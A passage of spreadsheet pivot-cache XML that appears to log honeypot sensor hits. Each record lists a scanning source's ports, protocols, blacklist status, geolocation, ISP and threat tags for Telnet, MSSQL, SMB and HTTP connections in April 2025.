    <s v="{Data_FTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_IMAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2005-08-18 02:10:45"/>
    <s v="2027-01-16 04:59:59"/>
    <s v="2024-01-29 18:09:26"/>
    <s v="['NS-1321.AWSDNS-37.ORG', 'NS-1670.AWSDNS-16.CO.UK', 'NS-27.AWSDNS-03.COM', 'NS-967.AWSDNS-56.NET']"/>
    <s v="MarkMonitor, Inc."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)', 'clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)', 'clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)', 'serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)', 'serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)', 'serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)']"/>
    <s v="Legal Department"/>
    <x v="12"/>
    <s v="NA"/>
    <s v="PO BOX 81226"/>
    <s v="::ffff:dda:b0a6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2885"/>
    <x v="2885"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T09:56:18"/>
    <d v="2025-04-06T04:45:59"/>
    <d v="2025-04-06T09:56:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:8ca0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2886"/>
    <x v="2886"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T09:25:18"/>
    <d v="2025-04-06T09:25:18"/>
    <d v="2025-04-06T09:25:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AS"/>
    <s v="Assam"/>
    <s v="Kamrup Metro"/>
    <s v="Guwahati (Jaya Nagar)"/>
    <s v="1271476"/>
    <s v="781015"/>
    <s v="26.1268"/>
    <s v="91.8059"/>
    <s v="135863"/>
    <s v="CATLA-AS-IN"/>
    <s v="Catla IT and Engg.Co.Pvt.Ltd"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6767:34ac"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2887"/>
    <x v="2887"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T09:14:38"/>
    <d v="2025-04-06T09:14:38"/>
    <d v="2025-04-06T09:14:38"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:9c2b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2888"/>
    <x v="2888"/>
    <s v="NA&amp;&amp;59-127-101-38.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-06T09:01:16"/>
    <d v="2025-01-20T06:51:58"/>
    <d v="2025-04-06T09:01:16"/>
    <n v="59"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="59939&amp;&amp;59958&amp;&amp;59976&amp;&amp;59922&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:6526"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2889"/>
    <x v="2889"/>
    <s v="220-133-90-223.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T09:01:03"/>
    <d v="2025-01-23T08:45:41"/>
    <d v="2025-04-06T09:01:03"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:5adf"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2890"/>
    <x v="2890"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:41:11"/>
    <d v="2025-03-12T08:35:01"/>
    <d v="2025-04-06T08:41:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:4ea9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2891"/>
    <x v="2891"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:24:00"/>
    <d v="2025-04-06T08:24:00"/>
    <d v="2025-04-06T08:24:00"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:c5c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2892"/>
    <x v="2892"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:22:11"/>
    <d v="2025-04-06T08:22:11"/>
    <d v="2025-04-06T08:22:11"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:58e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2893"/>
    <x v="2893"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:20:16"/>
    <d v="2025-04-06T08:20:16"/>
    <d v="2025-04-06T08:20:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="KU"/>
    <s v="Al Asimah"/>
    <s v="NA"/>
    <s v="Kuwait City (Jibla)"/>
    <s v="285787"/>
    <s v="NA"/>
    <s v="29.3716"/>
    <s v="47.9736"/>
    <s v="42961"/>
    <s v="GPRS-AS"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="consumer"/>
    <s v="MTC GPRS AS Number"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2eba:f79c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2894"/>
    <x v="2894"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:19:57"/>
    <d v="2025-04-06T08:17:52"/>
    <d v="2025-04-06T08:19:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:63a5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2895"/>
    <x v="2895"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:11:23"/>
    <d v="2025-03-30T05:23:17"/>
    <d v="2025-04-06T08:11:23"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e20:c09e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2896"/>
    <x v="2896"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:09:00"/>
    <d v="2025-04-05T20:40:15"/>
    <d v="2025-04-06T08:09:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2010-02-24"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63b:5b0f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2897"/>
    <x v="2897"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T08:03:34"/>
    <d v="2025-04-06T08:03:34"/>
    <d v="2025-04-06T08:03:34"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:3f1c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2898"/>
    <x v="2898"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T07:43:32"/>
    <d v="2025-01-13T05:45:40"/>
    <d v="2025-04-06T07:43:32"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2006-04-07"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7999:4c2a"/>
    <s v="None"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2899"/>
    <x v="2899"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T07:40:49"/>
    <d v="2025-01-03T07:55:27"/>
    <d v="2025-04-06T07:40:49"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="NA"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.19445"/>
    <s v="106.823"/>
    <s v="38482"/>
    <s v="BIZNET"/>
    <s v="Biznet Networks"/>
    <s v="business"/>
    <s v="GI"/>
    <s v="2007-07-11"/>
    <s v="BIZNET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,55016)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,59072)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,61557)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,62111)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,57478)}&amp;&amp;{Data_SMB:Incoming connection (117.102.88.42,57976)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7566:582a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2900"/>
    <x v="2900"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T07:24:26"/>
    <d v="2025-04-06T00:15:13"/>
    <d v="2025-04-06T07:24:26"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanchipuram"/>
    <s v="Kanchipuram"/>
    <s v="1268159"/>
    <s v="NA"/>
    <s v="12.8351"/>
    <s v="79.7001"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:b38f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2901"/>
    <x v="2901"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T07:19:23"/>
    <d v="2025-04-06T07:19:23"/>
    <d v="2025-04-06T07:19:23"/>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d:9b35"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2902"/>
    <x v="2902"/>
    <s v="114-35-133-60.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T07:01:22"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-06T07:01:22"/>
    <n v="297"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;26397&amp;&amp;23&amp;&amp;59370&amp;&amp;80&amp;&amp;9100&amp;&amp;4109&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:853c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2903"/>
    <x v="2903"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T07:01:04"/>
    <d v="2024-09-10T15:52:00"/>
    <d v="2025-04-06T07:01:04"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot Blacklisted IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
